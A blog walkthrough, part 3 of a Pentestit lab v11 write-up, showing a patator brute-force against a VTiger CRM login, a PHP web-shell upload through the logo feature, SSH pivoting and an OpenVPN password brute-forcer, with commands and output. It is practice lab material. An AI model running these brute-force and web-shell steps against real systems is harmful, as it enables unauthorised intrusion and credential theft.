Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 3

 

VTIGER CRM – 192.168.101.10:88

Upon loading the VTiger CRM webpage we are presented with a login box which fortunately for us shows us the version of the CRM software running the site:

Testing via firefox and copying the post request out of developer tools => Network as a curl command I separate each param into a newline for readability and we quickly see 4 interesting params:

  • PHP Session id in the cookie value
  • __vtrftk:sid appears to be a CSRF value
  • username parameter
  • password parameter

NOTE: the default credentials found here:
https://wiki.vtiger.com/index.php/Installation_with_Source
are admin:admin and did not work, however the default username is useful….

Based on this we can use a brute forcer to attempt a login to the CRM page, after some research it appears patator is a good fit for this.

NOTE: this is built into Kali and my instance was running v0.6 which caused a number of issues, updating to v0.7 cured those issues and allowed me to successfully execute a BF attack against the CRM.

Store the Params:

As we now have our session id and a CSRF token we can store these as an environment variable in Kali:

Execute Patator v0.7:

Not being an expert with patator this took me some time to get right and i sought advice from people around me that did have knowledge of patator in order to get a working script below, including a good example here:
https://blog.g0tmi1k.com/dvwa/bruteforce-high/
Another very useful link for patator modules:
https://en.kali.tools/?p=147

 

patator.py http_fuzz url="http://192.168.101.10:88/index.php?module=Users&action=Login" \ 
    method=POST body="__vtrftk=sid:${CSRF}&username=admin&password=FILE0" \
    0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=0 header="Cookie: ${SESSID}" \
    before_urls="http://192.168.101.10:88/index.php" before_header="Cookie: ${SESSID}" \
    -x ignore:egrep="Invalid username or password"

NB: After some testing post exploitation I am confident the CSRF token is not enforced.

Leaving this running a password result was returned after around 20 mins

17:08:56 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2017-07-26 17:08 BST
17:09:05 patator    INFO -                                                                              
17:09:05 patator    INFO - code size:clen       time | candidate                          |   num | mesg
17:09:05 patator    INFO - -----------------------------------------------------------------------------
17:09:08 patator    INFO - 200  43206:-1       1.985 | SPOILER_REMOVED!                          |     1 | HTTP/1.1 200 OK

Once logged in we navigate to our user account preferences in order to gain information about the account we are currently logged in as:

From the preferences page we gain the following information

  • Username: admin
  • Firstname: darthvader
  • Email: admin@test.lab

While looking for exploit routes a searchsploit of the version turns up a single exploit for this version of VTiger CRM:

 

Exploiting VTiger CRM:

  • The exploit states this: Vtiger CRM allows for the upload of a “company logo” from within the administrative interface.
  • The corresponding functionality can be accessed on the “CRM Settings” page (Settings -> CRM Settings -> Templates -> Company Details -> “Edit” button.
  • tests blocked php tags so found a shell that base64 encode/decodes the payload here: https://github.com/NSAKEY/Top-103-shells/blob/master/Top%20103%20shells/b374k-mini-shell-php.php.txt

Now the tag issue is identified we can now do the following items in order to gain a web shell on the server:

  • Right click company logo and view in new tab shows the folder path: http://192.168.101.10:88/test/logo/vtiger-crm-logo.png
  • Setup BURP suite to intercept the traffic so when we upload an image we can catch and manipulate the upload content data.
  • Select the Edit button as outlined above and upload valid image.
  • Intercept the upload request in Burpsuite and replace the filename= path with the /test/logo path found during testing and then replace the content data within the “CompanyDetailsSave” multipart tag with the encoded php shell:

[screenshot above was an earlier test hence filename difference.]

  • Once uploaded successfully we can now navigate to our shell location and spawn a php shell:
    http://192.168.101.10:88/test/logo/sbshell.php
  • NOTE: Its worth sending our url above to repeater as i lost connection and subsequently the machine appears to reset regular and we lose our shell.
  • On re-navigating around a new connection to the server we find the RCE_token.txt:

 

  • MySql User Found:

 

Now we have submitted our RCE token for the CRM system to our user control panel and gained our points we can now move forward and concentrate on the roundcube mail server….

Roundcube MAIL – 192.168.101.10:8080

Based on the fact we can see our user (darthvader) is a starwars fan i spent some time online and created a small starwars based wordlist: starwars_wordlist

As it turns out the email found in crm and the password of the username “darthvader” was the way into the roundcube mail client.

On looking around in the entire roundcube client we see one mail containing an RSA key for the “Office 2” location with the username “tech”

We can now connect to site 2 in the following manner:
remember its port 2222!

ssh tech@192.168.101.11 -p 2222 -i ~/pentestitlabs/site2.key

Once in we run begin to enum the gateway and the network it belongs to in order to understand its function.

Gateway 101.11 ifconfig

The first check made was a basic ifconfig to see what host networks this host belongs too and immediately we strengthen a suspicion that the two sites are potentially cross connected via a site to site vpn by virtue of the tun0 adapter:

 

tech@tl11-gw-2:~$ /sbin/ifconfig 
eth0      Link encap:Ethernet  HWaddr 08:00:27:95:c0:42  
          inet addr:192.168.101.11  Bcast:192.168.101.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe95:c042/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17506545 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13990588 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3391882723 (3.1 GiB)  TX bytes:7917471820 (7.3 GiB)

eth1      Link encap:Ethernet  HWaddr 08:00:27:d2:17:51  
          inet addr:192.168.13.254  Bcast:192.168.13.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fed2:1751/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11495218 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17161079 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5378508075 (5.0 GiB)  TX bytes:2823360693 (2.6 GiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1553444 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1553444 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:134362946 (128.1 MiB)  TX bytes:134362946 (128.1 MiB)

tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:10.255.0.6  P-t-P:10.255.0.5  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:30156 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30167 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:2533104 (2.4 MiB)  TX bytes:2533836 (2.4 MiB)

PS AUX shows opvenvpn connected with the server conf profile:

 

root     29057  0.0  0.2  24940  5024 ?        Ss   Jul22   0:33 
/usr/sbin/openvpn --daemon ovpn-server --status /run/openvpn/server.status 10 
--cd /etc/openvpn --config /etc/openvpn/server.conf

Openvpn Server.conf

Cat results for the server.conf, as the cert is included in the file we export this locally as a cert for later use including the entire server.conf file:

tech@tl11-gw-2:~$ cat /etc/openvpn/server.conf
client
dev tun
proto tcp
remote 192.168.101.10 1194
remote-cert-tls server

#####
#ping 3
#ping-restart 60
#####

script-security 2

up	/etc/openvpn/update-resolv-conf
down	/etc/openvpn/update-resolv-conf

## auth for Office-2 user
auth-user-pass "/opt/openvpn/auth.txt"

resolv-retry infinite
persist-key
persist-tun
comp-lzo

<ca>
-----BEGIN CERTIFICATE-----
MIIEXjCCA0agAwIBAgIJAKYiQCcisQFFMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNV
BAYTAlJVMQ8wDQYDVQQIEwZNb3Njb3cxDzANBgNVBAcTBk1vc2NvdzERMA8GA1UE
ChMIQ29tYXBhbnkxCzAJBgNVBAsTAklUMRkwFwYDVQQDExBjb21wYW55LnRlc3Qu
TRUNCATED.....
hF1vr0KOCI6ODTwPEPJwAd9mcdRQK0Jd52WvuvdGQKUC8DPPDo4B2VHAn8KIDIJp
b+mecHvvxGTSzo4k5nz4bdpYit9i9HayvJ3uIjt05jciQkp5bi5YUXEpq0cspNLr
awoYzU/p/oTvFG8sn8EWAl6pPonQUCGka7GRG2Q9Na9QysMG8H5hITZ7d5VngyrJ
vwj14awsaPvMoIgk8C8Zrkuu
-----END CERTIFICATE-----
</ca>

log /var/log/openvpn-client.log
verb 3

 

Attacking OPENVPN Password

The first thing to note is the username was included in the server.conf as a comment field:

## auth for Office-2 user

so we can use the office-2 user name and enumerate the password only, it tried crowbar as this was returned as a top result in google for brute forcing openvpn however either my virtual machine or implementation was problematic and I could not get this to successfully gain a password.

Based on this and in an effort to learn I decided to write my own bruteforcer for openvpn which did return a result within 5-10 minutes (did not time apologies):

COMMAND:

python brute_openvpn.py --host 192.168.101.10 \
    --config /home/scripts/python/server.conf \
    --user Office-2 \
    --passlist /usr/share/john/password.lst

RESULTS:

[+] SUCCESS! command = /usr/sbin/openvpn --remote 192.168.101.10 \
    --config /home/scripts/python/server.conf \
    --auth-user-pass /tmp/sb_test/tmp4HdLuM
[+] Password: ***REMOVED***
[+] VPN Process stopped and temp files removed

I have uploaded this script to github and it can be obtained here: Openvpn bruteforcer

With this in place we are now able to traverse into the Site1 Network, however we still have targets within the SITE2 location to enumerate and attack…..

PART 4:

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019